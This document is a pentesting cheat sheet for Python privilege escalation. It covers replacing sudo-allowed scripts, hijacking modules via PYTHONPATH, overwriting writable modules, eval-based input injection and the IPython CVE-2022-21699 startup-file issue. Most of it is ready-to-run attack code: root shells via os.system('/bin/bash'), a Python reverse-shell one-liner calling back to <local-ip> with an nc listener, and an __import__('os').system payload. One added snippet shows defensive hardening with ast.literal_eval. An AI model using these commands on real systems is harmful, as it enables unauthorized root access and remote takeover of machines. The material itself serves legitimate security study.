# Python Privilege Escalation

### Sudo PrivEsc

#### Replace with Arbitrary Script

```bash
sudo -l

(root) NOPASSWD: /usr/bin/python3 /home/<username>/example.py
```

If the Python script is located in the current user's home directory, we can remove it and create a new one with the same name.

```bash
rm -rf /home/<username>/example.py
touch /home/<username>/example.py
```

We can put arbitrary code in the new script. For example:

```python
import os;os.system('/bin/bash')
```

#### Module Hijacking

Assume the Python script can be executed as root with **SETENV,NOPASSWD**.\
For example:

```sh
sudo -l

(root) SETENV: NOPASSWD: /usr/bin/python3 /opt/example.py
```

With **SETENV**, we can set **PYTHONPATH** when executing the script, so a module of our own is imported in place of the one the script expects.\
First, check which modules the Python script imports (e.g. /opt/example.py here).

```python
import random

print(random.randint(1, 8))
```

We can forge the imported module by creating a file with the same name in a directory we control:

```sh
vim /tmp/random.py
```

The content of the module is below. It is a one-liner that spawns a reverse shell.\
Replace **`<local-ip>`** with your local IP address.

```python
import socket,os,pty;s=socket.socket();s.connect(("<local-ip>",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
```

Then, in another local terminal, start a listener to catch the shell.

```sh
nc -lvnp 4444
```

Then, on the remote machine, run the Python script with **PYTHONPATH** overridden.

```sh
sudo PYTHONPATH=/tmp/ /usr/bin/python3 /opt/example.py
```

With **"PYTHONPATH=/tmp/"**, the interpreter searches **/tmp/** before the standard library directories, so the **"random"** module is loaded from **/tmp/random.py**.\
We should then receive a shell in the local terminal.

#### Module Overriding

If the Python script imports a module whose file is writable by the current user, we can inject arbitrary code into that module.\
First, check which modules the Python script imports.

```python
# example.py
import random
```

Assume the **"random"** module is used in the script.\
Find the path of the module and check whether it is writable.

```bash
find / -name "random.py" 2>/dev/null
ls -al /usr/lib/python3.6/random.py
```

If it is writable, inject arbitrary code into the module.\
Assume the **"random"** module's path is **`/usr/lib/python3.6/random.py`**.

```python
# /usr/lib/python3.6/random.py
import os;os.system('/bin/bash')
```

Then run the Python script with sudo and a root shell is spawned.


### OS Commands in input()

Suppose you find an executable that was written in Python and prompts for input.\
For instance:

```sh
./executable

Enter some input:
```

If the program evaluates what it reads (Python 2's `input()` does this on its own, and a Python 3 program that calls `eval(input())` behaves the same way), you can enter a Python expression that runs an OS command.

```python
__import__('os').system('id')
```

For example,

```sh
./executable

Enter some input: __import__('os').system('id')
```
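As an added defensive example that is not part of the original page, here is the pattern that makes the prompt above exploitable, `eval` applied to user input, beside a hardened parser that accepts only an integer literal; the function and constant names are my own.

```python
import ast

# Constructed sample input: the kind of string the page shows being typed at the
# prompt. The hardened parser must reject it rather than evaluate it.
MALICIOUS_INPUT = "__import__('os').system('id')"


def parse_vulnerable(text):
    """The pattern behind the issue: Python 2 input() is eval(raw_input()),
    and Python 3 code that wraps input() in eval() behaves the same way.
    Whatever expression the user types runs with the program's privileges.
    Shown only for comparison; never call it on untrusted text."""
    return eval(text)


def parse_hardened(text):
    """Accept only an integer literal.

    ast.literal_eval evaluates literal syntax (numbers, strings, tuples, ...)
    but refuses calls, attribute access and names, so __import__(...) raises
    ValueError instead of executing. The type check then narrows the result
    to the one kind of value the program actually expects."""
    try:
        value = ast.literal_eval(text.strip())
    except (ValueError, SyntaxError) as exc:
        raise ValueError(f"not a literal: {text!r}") from exc
    # bool is a subclass of int, so reject it explicitly.
    if not isinstance(value, int) or isinstance(value, bool):
        raise ValueError(f"expected an integer, got {type(value).__name__}")
    return value


def is_rejected(text):
    """True if the hardened parser refuses the input."""
    try:
        parse_hardened(text)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(parse_hardened("42"))          # 42
    print(is_rejected(MALICIOUS_INPUT))  # True
```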


### IPython Privilege Escalation ([CVE-2022-21699](https://github.com/advisories/GHSA-pq7m-3gw7-gq5x))

Interactive Python (IPython) is a command shell for interactive computing in multiple programming languages.\
IPython versions affected by this CVE load startup files from a `profile_default` directory found under the current working directory, so a user who launches `ipython` from `/tmp` executes the script placed there by the commands below.

```sh
# -m: set the permission mode of the new directory (777 = rwx for everyone)
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/exploit.py
```

